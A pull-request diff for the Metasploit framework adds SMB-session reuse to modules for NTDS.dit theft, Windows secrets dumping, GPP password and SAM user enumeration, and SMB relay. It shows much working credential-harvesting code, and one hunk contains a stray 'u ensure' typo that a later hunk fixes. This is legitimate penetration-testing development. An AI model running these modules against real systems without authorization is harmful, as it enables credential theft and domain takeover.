### PR TITLE
Smb session type modules

### DIFF
--- a/lib/msf/core/auxiliary/scanner.rb
+++ b/lib/msf/core/auxiliary/scanner.rb
@@ -57,6 +57,10 @@ def run
   @show_progress = datastore['ShowProgress']
   @show_percent  = datastore['ShowProgressPercent'].to_i
 
+  if self.respond_to?(:session) && session
+    datastore['RHOSTS'] = session.address
+  end
+
   rhosts_walker  = Msf::RhostsWalker.new(self.datastore['RHOSTS'], self.datastore).to_enum
   @range_count   = rhosts_walker.count || 0
   @range_done    = 0
@@ -358,4 +362,3 @@ end
 
 end
 end
-

--- a/lib/msf/core/module/has_actions.rb
+++ b/lib/msf/core/module/has_actions.rb
@@ -8,15 +8,16 @@ module Msf::Module::HasActions
       [ Msf::Module::AuxiliaryAction ], 'AuxiliaryAction'
     )
 
-    self.passive = (info['Passive'] and info['Passive'] == true) || false
+    self.passive = (info['Stance'] and info['Stance'].include?(Msf::Exploit::Stance::Passive)) || false
     self.default_action = info['DefaultAction']
     self.passive_actions = info['PassiveActions'] || []
   end
 
   def action
-    sa = datastore['ACTION']
-    return find_action(default_action) if not sa
-    return find_action(sa)
+    sa = find_action(datastore['ACTION'])
+    return find_action(default_action) unless sa
+
+    sa
   end
 
   def find_action(name)
@@ -31,9 +32,10 @@ module Msf::Module::HasActions
   # Returns a boolean indicating whether this module should be run passively
   #
   def passive?
-    act = action()
-    return passive_action?(act.name) if act
-    return self.passive
+    act = action
+    return passive || passive_action?(act.name) if act
+
+    passive
   end
 
   #

--- a/lib/msf/core/optional_session.rb
+++ b/lib/msf/core/optional_session.rb
@@ -23,6 +23,7 @@ module Msf::OptionalSession
 
   def session
     return nil unless framework.features.enabled?(Msf::FeatureManager::SMB_SESSION_TYPE)
+
     super
   end
 end

--- a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb
+++ b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Auxiliary
   # Exploit mixins should be called first
   include Msf::Exploit::Remote::SMB::Client::Psexec
   include Msf::Auxiliary::Report
+  include Msf::OptionalSession
 
   # Aliases for common classes
   SIMPLE = Rex::Proto::SMB::SimpleClient
@@ -33,7 +34,8 @@ class MetasploitModule < Msf::Auxiliary
       'References' => [
         [ 'URL', 'http://sourceforge.net/projects/smbexec' ],
         [ 'URL', 'https://www.optiv.com/blog/owning-computers-without-shell-access' ]
-      ]
+      ],
+      'SessionTypes' => %w[SMB]
     ))
 
     register_options([
@@ -54,7 +56,13 @@ class MetasploitModule < Msf::Auxiliary
     @ip = datastore['RHOST']
     @smbshare = datastore['SMBSHARE']
     # Try and connect
-    if connect
+    if session
+      print_status("Using existing session #{session.sid}")
+      client = session.client
+      self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)
+      @ip = simple.address
+    else
+      return unless connect
       # Try and authenticate with given credentials
       begin
         smb_login
@@ -62,29 +70,30 @@ class MetasploitModule < Msf::Auxiliary
         print_error("Unable to authenticate with given credentials: #{autherror}")
         return
       end
-      # If a VSC was specified then don't try and create one
-      if datastore['VSCPATH'].length > 0
-        print_status("Attempting to copy NTDS.dit from #{datastore['VSCPATH']}")
-        vscpath = datastore['VSCPATH']
-      else
-        unless datastore['CREATE_NEW_VSC']
-          vscpath = check_vss(text, bat)
-        end
-        unless vscpath
-          vscpath = make_volume_shadow_copy(createvsc, text, bat)
-        end
-      end
-      if vscpath
-        if copy_ntds(vscpath, text) and copy_sys_hive
-          download_ntds((datastore['WINPATH'] + "\\Temp\\ntds"))
-          download_sys_hive((datastore['WINPATH'] + "\\Temp\\sys"))
-        else
-          print_error("Failed to find a volume shadow copy.  Issuing cleanup command sequence.")
-        end
-      end
-      cleanup_after(bat, text, "\\#{datastore['WINPATH']}\\Temp\\ntds", "\\#{datastore['WINPATH']}\\Temp\\sys")
-      disconnect
     end
+    # If a VSC was specified then don't try and create one
+    if datastore['VSCPATH'].length > 0
+      print_status("Attempting to copy NTDS.dit from #{datastore['VSCPATH']}")
+      vscpath = datastore['VSCPATH']
+    else
+      unless datastore['CREATE_NEW_VSC']
+        vscpath = check_vss(text, bat)
+      end
+      unless vscpath
+        vscpath = make_volume_shadow_copy(createvsc, text, bat)
+      end
+    end
+
+    if vscpath
+      if copy_ntds(vscpath, text) and copy_sys_hive
+        download_ntds((datastore['WINPATH'] + "\\Temp\\ntds"))
+        download_sys_hive((datastore['WINPATH'] + "\\Temp\\sys"))
+      else
+        print_error("Failed to find a volume shadow copy.  Issuing cleanup command sequence.")
+      end
+    end
+    cleanup_after(bat, text, "\\#{datastore['WINPATH']}\\Temp\\ntds", "\\#{datastore['WINPATH']}\\Temp\\sys")
+    disconnect
   end
 
 

--- a/modules/auxiliary/admin/smb/upload_file.rb
+++ b/modules/auxiliary/admin/smb/upload_file.rb
@@ -12,6 +12,7 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::SMB::Client::RemotePaths
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
+  include Msf::OptionalSession
 
   def initialize
     super(
@@ -41,12 +42,19 @@ class MetasploitModule < Msf::Auxiliary
     validate_lpaths!
     validate_rpaths!
     begin
-      vprint_status("Connecting to the server...")
-      connect
-      smb_login()
+      if session
+        print_status("Using existing session #{session.sid}")
+        client = session.client
+        self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)
 
-      vprint_status("Mounting the remote share \\\\#{datastore['RHOST']}\\#{datastore['SMBSHARE']}'...")
-      self.simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}")
+      else
+        vprint_status("Connecting to the server...")
+        connect
+        smb_login()
+      end
+
+      vprint_status("Mounting the remote share \\\\#{simple.address}\\#{datastore['SMBSHARE']}'...")
+      self.simple.connect("\\\\#{simple.address}\\#{datastore['SMBSHARE']}")
 
       remote_path = remote_paths.first
 

--- a/modules/auxiliary/admin/smb/upload_file.rb
+++ b/modules/auxiliary/admin/smb/upload_file.rb
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Auxiliary
       'References'  =>
         [
         ],
-      'License'     => MSF_LICENSE
+      'License'     => MSF_LICENSE,
+      'SessionTypes' => %w[SMB]
     )
 
     register_options([

--- a/modules/auxiliary/gather/windows_secrets_dump.rb
+++ b/modules/auxiliary/gather/windows_secrets_dump.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Util::WindowsRegistry
   include Msf::Util::WindowsCryptoHelpers
+  include Msf::OptionalSession
 
   # Mapping of MS-SAMR encryption keys to IANA Kerberos Parameter values
   #
@@ -73,7 +74,8 @@ class MetasploitModule < Msf::Auxiliary
           [ 'LSA', { 'Description' => 'Dump LSA secrets' } ],
           [ 'DOMAIN', { 'Description' => 'Dump domain secrets (credentials, password history, Kerberos keys, etc.)' } ]
         ],
-        'DefaultAction' => 'ALL'
+        'DefaultAction' => 'ALL',
+        'SessionTypes' => %w[SMB]
       )
     )
 
@@ -170,7 +172,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def retrieve_hive(hive_name)
     file_name = save_registry_key(hive_name)
-    tree2 = simple.client.tree_connect("\\\\#{sock.peerhost}\\ADMIN$")
+    tree2 = simple.client.tree_connect("\\\\#{simple.address}\\ADMIN$")
     file = tree2.open_file(filename: "Temp\\#{file_name}", delete: true, read: true)
     file.read
   ensure
@@ -193,8 +195,8 @@ class MetasploitModule < Msf::Auxiliary
     user, hash, type: :ntlm_hash, jtr_format: '', realm_key: nil, realm_value: nil
   )
     service_data = {
-      address: rhost,
-      port: rport,
+      address: simple.address,
+      port: simple.port,
       service_name: 'smb',
       protocol: 'tcp',
       workspace_id: myworkspace_id
@@ -216,8 +218,8 @@ class MetasploitModule < Msf::Auxiliary
 
   def report_info(data, type = '')
     report_note(
-      host: rhost,
-      port: rport,
+      host: simple.address,
+      port: simple.port,
       proto: 'tcp',
       sname: 'smb',
       type: type,
@@ -629,7 +631,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def connect_drs
     dcerpc_client = RubySMB::Dcerpc::Client.new(
-      rhost,
+      simple.address,
       RubySMB::Dcerpc::Drsr,
       username: datastore['SMBUser'],
       password: datastore['SMBPass']
@@ -1014,7 +1016,7 @@ class MetasploitModule < Msf::Auxiliary
     @svcctl.bind(endpoint: RubySMB::Dcerpc::Svcctl)
     vprint_good('Bound to \\svcctl')
 
-    @svcctl.open_sc_manager_w(sock.peerhost)
+    @svcctl.open_sc_manager_w(simple.address)
   end
 
   def run
@@ -1022,16 +1024,23 @@ class MetasploitModule < Msf::Auxiliary
       print_warning('Cannot find any active database. Extracted data will only be displayed here and NOT stored.')
     end
 
-    connect
-    begin
-      smb_login
-    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
-      fail_with(Module::Failure::NoAccess,
-                "Unable to authenticate ([#{e.class}] #{e}).")
+    if session
+      print_status("Using existing session #{session.sid}")
+      client = session.client
+      self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)
+      simple.connect("\\\\#{simple.address}\\IPC$") # smb_login connects to this share for some reason and it doesn't work unless we do too
+    else
+      connect
+      begin
+        smb_login
+      rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e
+        fail_with(Module::Failure::NoAccess, "Unable to authenticate ([#{e.class}] #{e}).")
+      end
     end
+
     report_service(
-      host: rhost,
-      port: rport,
+      host: simple.address,
+      port: simple.port,
       host_name: simple.client.default_name,
       proto: 'tcp',
       name: 'smb',
@@ -1039,7 +1048,7 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     begin
-      @tree = simple.client.tree_connect("\\\\#{sock.peerhost}\\IPC$")
+      @tree = simple.client.tree_connect("\\\\#{simple.address}\\IPC$")
     rescue RubySMB::Error::RubySMBError => e
       fail_with(Module::Failure::Unreachable,
                 "Unable to connect to the remote IPC$ share ([#{e.class}] #{e}).")

--- a/modules/auxiliary/scanner/smb/pipe_auditor.rb
+++ b/modules/auxiliary/scanner/smb/pipe_auditor.rb
@@ -14,12 +14,15 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
 
+  include Msf::OptionalSession
+
   def initialize
     super(
       'Name'        => 'SMB Session Pipe Auditor',
       'Description' => 'Determine what named pipes are accessible over SMB',
       'Author'      => 'hdm',
-      'License'     => MSF_LICENSE
+      'License'     => MSF_LICENSE,
+      'SessionTypes' => %w[SMB]
     )
 
     deregister_options('RPORT', 'SMBDirect')
@@ -30,25 +33,31 @@ class MetasploitModule < Msf::Auxiliary
 
     pipes = []
 
-    [[139, false], [445, true]].each do |info|
+    if session
+      print_status("Using existing session #{session.sid}")
+      client = session.client
+      datastore['RPORT'] = session.port
+      self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)
+      self.simple.connect("\\\\#{session.address}\\IPC$")
+      pipes += check_pipes
+    else
+      [[139, false], [445, true]].each do |info|
 
-      datastore['RPORT'] = info[0]
-      datastore['SMBDirect'] = info[1]
+        datastore['RPORT'] = info[0]
+        datastore['SMBDirect'] = info[1]
 
-      begin
-        connect
-        smb_login()
-        check_named_pipes.each do |pipe_name, _|
-          pipes.push(pipe_name)
+        begin
+          connect
+          smb_login
+          pipes += check_pipes
+          disconnect
+          break
+        rescue Rex::Proto::SMB::Exceptions::SimpleClientError, Rex::ConnectionError => e
+          vprint_error("SMB client Error with RPORT=#{info[0]} SMBDirect=#{info[1]}: #{e.to_s}")
         end
-
-        disconnect()
-
-        break
-      rescue Rex::Proto::SMB::Exceptions::SimpleClientError, Rex::ConnectionError => e
-        vprint_error("SMB client Error with RPORT=#{info[0]} SMBDirect=#{info[1]}: #{e.to_s}")
       end
     end
+
 
     if(pipes.length > 0)
       print_good("Pipes: #{pipes.join(", ")}")
@@ -64,5 +73,11 @@ class MetasploitModule < Msf::Auxiliary
     end
   end
 
-
+  def check_pipes
+    pipes = []
+    check_named_pipes.each do |pipe_name, _|
+      pipes.push(pipe_name)
+    end
+    pipes
+  end
 end

--- a/modules/auxiliary/scanner/smb/smb_enum_gpp.rb
+++ b/modules/auxiliary/scanner/smb/smb_enum_gpp.rb
@@ -202,7 +202,7 @@ class MetasploitModule < Msf::Auxiliary
       end
     rescue ::Exception => e
       print_error("#{simple.address}: #{e.class} #{e}")
-      u    ensure
+    ensure
       disconnect
     end
   end

--- a/modules/auxiliary/scanner/smb/smb_enum_gpp.rb
+++ b/modules/auxiliary/scanner/smb/smb_enum_gpp.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::SMB::Client::Authenticated
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
+  include Msf::OptionalSession
 
   # Aliases for common classes
   SIMPLE = Rex::Proto::SMB::Client
@@ -36,7 +37,8 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx'],
           ['URL', 'https://labs.portcullis.co.uk/blog/are-you-considering-using-microsoft-group-policy-preferences-think-again/']
         ],
-      'License'     => MSF_LICENSE
+      'License'     => MSF_LICENSE,
+      'SessionTypes' => %w[SMB]
     )
     register_options([
       OptString.new('SMBSHARE', [true, 'The name of the share on the server', 'SYSVOL']),
@@ -164,10 +166,17 @@ class MetasploitModule < Msf::Auxiliary
   def run_host(ip)
     print_status('Connecting to the server...')
     begin
-      connect
-      smb_login
-      print_status("Mounting the remote share \\\\#{ip}\\#{datastore['SMBSHARE']}'...")
-      tree = simple.client.tree_connect("\\\\#{ip}\\#{datastore['SMBSHARE']}")
+      if session
+        print_status("Using existing session #{session.sid}")
+        client = session.client
+        self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)
+      else
+        connect
+        smb_login
+      end
+
+      print_status("Mounting the remote share \\\\#{simple.address}\\#{datastore['SMBSHARE']}'...")
+      tree = simple.client.tree_connect("\\\\#{simple.address}\\#{datastore['SMBSHARE']}")
 
       corp_domain = tree.list.map { |entry| entry.file_name.value.to_s.encode }.detect { |entry| entry != '.' && entry != '..' }
       fail_with(Failure::NotFound, 'Could not find the domain folder') if corp_domain.nil?
@@ -188,12 +197,12 @@ class MetasploitModule < Msf::Auxiliary
       sub_folders.each do |sub_folder|
         next if sub_folder == '.' || sub_folder == '..'
         gpp_locations.each do |gpp_l|
-          check_path(ip,"#{corp_domain}\\Policies\\#{sub_folder}\\#{gpp_l}")
+          check_path(simple.address,"#{corp_domain}\\Policies\\#{sub_folder}\\#{gpp_l}")
         end
       end
     rescue ::Exception => e
-      print_error("#{rhost}: #{e.class} #{e}")
-    ensure
+      print_error("#{simple.address}: #{e.class} #{e}")
+      u    ensure
       disconnect
     end
   end

--- a/modules/auxiliary/scanner/smb/smb_enumusers.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumusers.rb
@@ -15,6 +15,8 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
 
+  include Msf::OptionalSession
+
   def initialize
     super(
       'Name'        => 'SMB User Enumeration (SAM EnumUsers)',
@@ -23,7 +25,8 @@ class MetasploitModule < Msf::Auxiliary
       'License'     => MSF_LICENSE,
       'DefaultOptions' => {
         'DCERPC::fake_bind_multi' => false
-      }
+      },
+      'SessionTypes' => %w[SMB]
     )
 
     register_options(
@@ -47,15 +50,17 @@ class MetasploitModule < Msf::Auxiliary
     found_pipe   = nil
     found_handle = nil
     pipes.each do |pipe_name|
-      connected = false
+      connected = session ? true : false
       begin
-        connect
-        smb_login
-        connected = true
+        unless connected
+          connect
+          smb_login
+          connected = true
+        end
 
-        handle = dcerpc_handle(
+        handle = dcerpc_handle_target(
           uuid, vers,
-          'ncacn_np', ["\\#{pipe_name}"]
+          'ncacn_np', ["\\#{pipe_name}"], simple.address
         )
 
         dcerpc_bind(handle)
@@ -138,201 +143,209 @@ class MetasploitModule < Msf::Auxiliary
 
   # Fingerprint a single host
   def run_host(ip)
+    ports = [139, 445]
 
-    [[139, false], [445, true]].each do |info|
+    if session
+      print_status("Using existing session #{session.sid}")
+      client = session.client
+      self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)
+      ports = [simple.port]
+      self.simple.connect("\\\\#{simple.address}\\IPC$") # smb_login connects to this share for some reason and it doesn't work unless we do too
+    end
 
-    @rport = info[0]
-    @smbdirect = info[1]
+    ports.each do |port|
 
-    sam_pipe   = nil
-    sam_handle = nil
-    begin
-      # Find the SAM pipe
-      sam_pipe = smb_find_dcerpc_pipe(@@sam_uuid, @@sam_vers, @@sam_pipes)
-      break if not sam_pipe
+      @rport = port
 
-      # Connect4
-      stub =
-        NDR.uwstring("\\\\" + ip) +
-        NDR.long(2) +
-        NDR.long(0x30)
+      sam_pipe   = nil
+      sam_handle = nil
+      begin
+        # Find the SAM pipe
+        sam_pipe = smb_find_dcerpc_pipe(@@sam_uuid, @@sam_vers, @@sam_pipes)
+        break if not sam_pipe
 
-      dcerpc.call(62, stub)
-      resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
-
-      if ! (resp and resp.length == 24)
-        print_error("Invalid response from the Connect5 request")
-        disconnect
-        return
-      end
-
-      phandle = resp[0,20]
-      perror  = resp[20,4].unpack("V")[0]
-
-      if(perror == 0xc0000022)
-        disconnect
-        return
-      end
-
-      if(perror != 0)
-        print_error("Received error #{"0x%.8x" % perror} from the OpenPolicy2 request")
-        disconnect
-        return
-      end
-
-      # EnumDomains
-      stub = phandle + NDR.long(0) + NDR.long(8192)
-      dcerpc.call(6, stub)
-      resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
-      domlist = smb_parse_sam_domains(resp)
-      domains = {}
-
-      # LookupDomain
-      domlist.each do |domain|
-        next if domain == 'Builtin'
-
-        # Round up the name to match NDR.uwstring() behavior
-        dlen = (domain.length + 1) * 2
-
-        # The SAM functions are picky on Windows 2000
+        # Connect4
         stub =
-          phandle +
-          [(domain.length + 0) * 2].pack("v") + # NameSize
-          [(domain.length + 1) * 2].pack("v") + # NameLen (includes null)
-          NDR.long(rand(0x100000000)) +
-          [domain.length + 1].pack("V") +	      # MaxCount (includes null)
-          NDR.long(0) +
-          [domain.length + 0].pack("V") +	      # ActualCount (ignores null)
-          Rex::Text.to_unicode(domain)          # No null appended
+          NDR.uwstring("\\\\" + simple.address) +
+          NDR.long(2) +
+          NDR.long(0x30)
 
-        dcerpc.call(5, stub)
-        resp    = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
-        raw_sid = resp[12, 20]
-        txt_sid = raw_sid.unpack("NVVVV").join("-")
-
-        domains[domain] = {
-          :sid_raw => raw_sid,
-          :sid_txt => txt_sid
-        }
-      end
-
-
-      # OpenDomain, QueryDomainInfo, CloseDomain
-      domains.each_key do |domain|
-
-        # Open
-        stub =
-          phandle +
-          NDR.long(0x00000305) +
-          NDR.long(4) +
-          [1,4,0].pack('CvC') +
-          domains[domain][:sid_raw]
-
-        dcerpc.call(7, stub)
-        resp    = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
-        dhandle = resp[0,20]
-        derror  = resp[20,4].unpack("V")[0]
-
-        # Catch access denied replies to OpenDomain
-        if(derror != 0)
-          next
-        end
-
-        # Password information
-        stub = dhandle + [0x01].pack('v')
-        dcerpc.call(8, stub)
-        resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
-        if(resp and resp[-4,4].unpack('V')[0] == 0)
-          mlen,hlen = resp[8,4].unpack('vv')
-          domains[domain][:pass_min] = mlen
-          domains[domain][:pass_min_history] = hlen
-        end
-
-        # Server Role
-        stub = dhandle + [0x07].pack('v')
-        dcerpc.call(8, stub)
-        if(resp and resp[-4,4].unpack('V')[0] == 0)
-          resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
-          domains[domain][:server_role] = resp[8,2].unpack('v')[0]
-        end
-
-        # Lockout Threshold
-        stub = dhandle + [12].pack('v')
-        dcerpc.call(8, stub)
+        dcerpc.call(62, stub)
         resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
 
-        if(resp and resp[-4,4].unpack('V')[0] == 0)
-          lduration = resp[8,8]
-          lwindow   = resp[16,8]
-          lthresh   = resp[24, 2].unpack('v')[0]
-
-          domains[domain][:lockout_threshold] = lthresh
-          domains[domain][:lockout_duration]  = Rex::Proto::SMB::Utils.time_smb_to_unix(*(lduration.unpack('V2')))
-          domains[domain][:lockout_window]    = Rex::Proto::SMB::Utils.time_smb_to_unix(*(lwindow.unpack('V2')))
+        if ! (resp and resp.length == 24)
+          print_error("Invalid response from the Connect5 request")
+          disconnect
+          return
         end
 
-        # Users
-        stub = dhandle + NDR.long(0) + NDR.long(0x10) + NDR.long(1024*1024)
-        dcerpc.call(13, stub)
-        resp  = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
-        if(resp and resp[-4,4].unpack('V')[0] == 0)
-          domains[domain][:users] = smb_parse_sam_users(resp)
+        phandle = resp[0,20]
+        perror  = resp[20,4].unpack("V")[0]
+
+        if(perror == 0xc0000022)
+          disconnect
+          return
         end
 
-
-        # Close Domain
-        dcerpc.call(1, dhandle)
-      end
-
-      # Close Policy
-      dcerpc.call(1, phandle)
-
-
-      domains.each_key do |domain|
-
-        # Delete the no longer used raw SID value
-        domains[domain].delete(:sid_raw)
-
-        # Store the domain name itself
-        domains[domain][:name] = domain
-
-        # Store the domain information
-        report_note(
-          :host => ip,
-          :proto => 'tcp',
-          :port => rport,
-          :type => 'smb.domain.enumusers',
-          :data => domains[domain]
-        )
-
-        users = domains[domain][:users] || {}
-        extra = ""
-        if (domains[domain][:lockout_threshold])
-          extra = "( "
-          extra << "LockoutTries=#{domains[domain][:lockout_threshold]} "
-          extra << "PasswordMin=#{domains[domain][:pass_min]} "
-          extra << ")"
+        if(perror != 0)
+          print_error("Received error #{"0x%.8x" % perror} from the OpenPolicy2 request")
+          disconnect
+          return
         end
-        print_good("#{domain.upcase} [ #{users.keys.map{|k| users[k]}.join(", ")} ] #{extra}")
-        if datastore['DB_ALL_USERS']
-          users.each { |user|
-            store_username(user, domain, ip, rport, resp)
+
+        # EnumDomains
+        stub = phandle + NDR.long(0) + NDR.long(8192)
+        dcerpc.call(6, stub)
+        resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
+        domlist = smb_parse_sam_domains(resp)
+        domains = {}
+
+        # LookupDomain
+        domlist.each do |domain|
+          next if domain == 'Builtin'
+
+          # Round up the name to match NDR.uwstring() behavior
+          dlen = (domain.length + 1) * 2
+
+          # The SAM functions are picky on Windows 2000
+          stub =
+            phandle +
+            [(domain.length + 0) * 2].pack("v") + # NameSize
+            [(domain.length + 1) * 2].pack("v") + # NameLen (includes null)
+            NDR.long(rand(0x100000000)) +
+            [domain.length + 1].pack("V") +	      # MaxCount (includes null)
+            NDR.long(0) +
+            [domain.length + 0].pack("V") +	      # ActualCount (ignores null)
+            Rex::Text.to_unicode(domain)          # No null appended
+
+          dcerpc.call(5, stub)
+          resp    = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
+          raw_sid = resp[12, 20]
+          txt_sid = raw_sid.unpack("NVVVV").join("-")
+
+          domains[domain] = {
+            :sid_raw => raw_sid,
+            :sid_txt => txt_sid
           }
         end
-      end
 
-      # cleanup
-      disconnect
-      return
-    rescue ::Timeout::Error
-    rescue ::Interrupt
-      raise $!
-    rescue ::Rex::ConnectionError
-    rescue ::Rex::Proto::SMB::Exceptions::LoginError
-      next
-    rescue ::Exception => e
-      print_line("Error: #{ip} #{e.class} #{e}")
-    end
+
+        # OpenDomain, QueryDomainInfo, CloseDomain
+        domains.each_key do |domain|
+
+          # Open
+          stub =
+            phandle +
+            NDR.long(0x00000305) +
+            NDR.long(4) +
+            [1,4,0].pack('CvC') +
+            domains[domain][:sid_raw]
+
+          dcerpc.call(7, stub)
+          resp    = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
+          dhandle = resp[0,20]
+          derror  = resp[20,4].unpack("V")[0]
+
+          # Catch access denied replies to OpenDomain
+          if(derror != 0)
+            next
+          end
+
+          # Password information
+          stub = dhandle + [0x01].pack('v')
+          dcerpc.call(8, stub)
+          resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
+          if(resp and resp[-4,4].unpack('V')[0] == 0)
+            mlen,hlen = resp[8,4].unpack('vv')
+            domains[domain][:pass_min] = mlen
+            domains[domain][:pass_min_history] = hlen
+          end
+
+          # Server Role
+          stub = dhandle + [0x07].pack('v')
+          dcerpc.call(8, stub)
+          if(resp and resp[-4,4].unpack('V')[0] == 0)
+            resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
+            domains[domain][:server_role] = resp[8,2].unpack('v')[0]
+          end
+
+          # Lockout Threshold
+          stub = dhandle + [12].pack('v')
+          dcerpc.call(8, stub)
+          resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
+
+          if(resp and resp[-4,4].unpack('V')[0] == 0)
+            lduration = resp[8,8]
+            lwindow   = resp[16,8]
+            lthresh   = resp[24, 2].unpack('v')[0]
+
+            domains[domain][:lockout_threshold] = lthresh
+            domains[domain][:lockout_duration]  = Rex::Proto::SMB::Utils.time_smb_to_unix(*(lduration.unpack('V2')))
+            domains[domain][:lockout_window]    = Rex::Proto::SMB::Utils.time_smb_to_unix(*(lwindow.unpack('V2')))
+          end
+
+          # Users
+          stub = dhandle + NDR.long(0) + NDR.long(0x10) + NDR.long(1024*1024)
+          dcerpc.call(13, stub)
+          resp  = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
+          if(resp and resp[-4,4].unpack('V')[0] == 0)
+            domains[domain][:users] = smb_parse_sam_users(resp)
+          end
+
+
+          # Close Domain
+          dcerpc.call(1, dhandle)
+        end
+
+        # Close Policy
+        dcerpc.call(1, phandle)
+
+
+        domains.each_key do |domain|
+
+          # Delete the no longer used raw SID value
+          domains[domain].delete(:sid_raw)
+
+          # Store the domain name itself
+          domains[domain][:name] = domain
+
+          # Store the domain information
+          report_note(
+            :host => simple.address,
+            :proto => 'tcp',
+            :port => rport,
+            :type => 'smb.domain.enumusers',
+            :data => domains[domain]
+          )
+
+          users = domains[domain][:users] || {}
+          extra = ""
+          if (domains[domain][:lockout_threshold])
+            extra = "( "
+            extra << "LockoutTries=#{domains[domain][:lockout_threshold]} "
+            extra << "PasswordMin=#{domains[domain][:pass_min]} "
+            extra << ")"
+          end
+          print_good("#{domain.upcase} [ #{users.keys.map{|k| users[k]}.join(", ")} ] #{extra}")
+          if datastore['DB_ALL_USERS']
+            users.each { |user|
+              store_username(user, domain, simple.address, rport, resp)
+            }
+          end
+        end
+
+        # cleanup
+        disconnect
+        return
+      rescue ::Timeout::Error
+      rescue ::Interrupt
+        raise $!
+      rescue ::Rex::ConnectionError
+      rescue ::Rex::Proto::SMB::Exceptions::LoginError
+        next
+      rescue ::Exception => e
+        print_line("Error: #{simple.address} #{e.class} #{e}")
+      end
     end
   end
 

--- a/modules/exploits/windows/smb/smb_relay.rb
+++ b/modules/exploits/windows/smb/smb_relay.rb
@@ -23,6 +23,8 @@ class MetasploitModule < Msf::Exploit::Remote
   include ::Msf::Exploit::Remote::SMB::Client::Psexec
   include ::Msf::Exploit::Powershell
   include Msf::Exploit::EXE
+  include Msf::Module::HasActions
+  include Msf::Auxiliary::CommandShell
 
   def initialize(info = {})
     super(
@@ -108,9 +110,9 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'DisclosureDate' => '2001-03-31',
         'DefaultTarget' => 0,
-        'Actions' => [['Capture', { 'Description' => 'Run SMB MITM server' }]],
-        'PassiveActions' => ['Capture'],
-        'DefaultAction' => 'Capture'
+        'Actions' => available_actions,
+        'Stance' => Msf::Exploit::Stance::Passive,
+        'DefaultAction' => 'PSEXEC'
       )
     )
 
@@ -137,7 +139,20 @@ class MetasploitModule < Msf::Exploit::Remote
       ]
     )
 
-    deregister_options('RPORT', 'RHOSTS', 'SMBPass', 'SMBUser')
+    deregister_options(
+      'RPORT', 'RHOSTS', 'SMBPass', 'SMBUser', 'CommandShellCleanupCommand', 'AutoVerifySession', 'CreateSession'
+    )
+  end
+
+  def available_actions
+    actions = [
+      ['PSEXEC', { 'Description' => 'Run psexec against the relay target' }]
+    ]
+    if framework.features.enabled?(Msf::FeatureManager::SMB_SESSION_TYPE)
+      actions << ['SMB_SESSION', { 'Description' => 'Get an SMB session' }]
+    end
+
+    actions
   end
 
   def smb_logger
@@ -277,12 +292,28 @@ class MetasploitModule < Msf::Exploit::Remote
     if datastore['RHOSTS'].present?
       print_warning('Warning: RHOSTS datastore value has been set which is not supported by this module. Please verify RELAY_TARGETS is set correctly.')
     end
-    validate_service_stub_encoder!
 
+    case action.name
+    when 'PSEXEC'
+      validate_service_stub_encoder!
+    end
     super
   end
 
   def on_relay_success(relay_connection:)
+    case action.name
+    when 'PSEXEC'
+      run_psexec(relay_connection)
+    when 'SMB_SESSION'
+      begin
+        session_setup(relay_connection)
+      rescue StandardError => e
+        elog('Failed to setup the session', error: e)
+      end
+    end
+  end
+
+  def run_psexec(relay_connection)
     # The psexec mixins assume a single smb client instance is available, which makes it impossible
     # to use when there are multiple SMB requests occurring in parallel. Let's create a replicant module,
     # and set the datastore options and simple smb instance
@@ -349,4 +380,31 @@ class MetasploitModule < Msf::Exploit::Remote
     handler
     disconnect
   end
+
+  # @param [RubySMB::Client] client
+  def session_setup(client)
+    return unless client
+
+    platform = 'windows'
+
+    # Create a new session
+    rstream = client.dispatcher.tcp_socket
+    sess = Msf::Sessions::SMB.new(
+      rstream,
+      {
+        client: client
+      }
+    )
